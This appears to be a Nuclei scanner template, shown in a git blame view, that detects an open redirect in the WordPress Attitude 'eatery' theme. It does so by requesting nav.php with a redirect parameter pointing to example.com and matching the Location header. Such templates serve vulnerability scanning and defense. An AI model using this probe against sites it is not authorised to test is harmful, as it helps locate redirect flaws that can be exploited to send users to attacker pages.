2021-09-17 09:40:30 +00:00
|
|
|
id: eatery-restaurant-open-redirect
|
2021-09-17 09:06:58 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress Attitude Themes 1.1.1 Open Redirection
|
|
|
|
author: 0x_Akoko
|
|
|
|
severity: low
|
2021-10-25 09:53:22 +00:00
|
|
|
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
|
2021-09-17 09:40:30 +00:00
|
|
|
reference: https://cxsecurity.com/issue/WLB-2020030183
|
|
|
|
tags: wordpress,wp-theme,redirect
|
2021-09-17 09:06:58 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/themes/eatery/nav.php?-Menu-=https://example.com/"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
|
|
|
part: header
|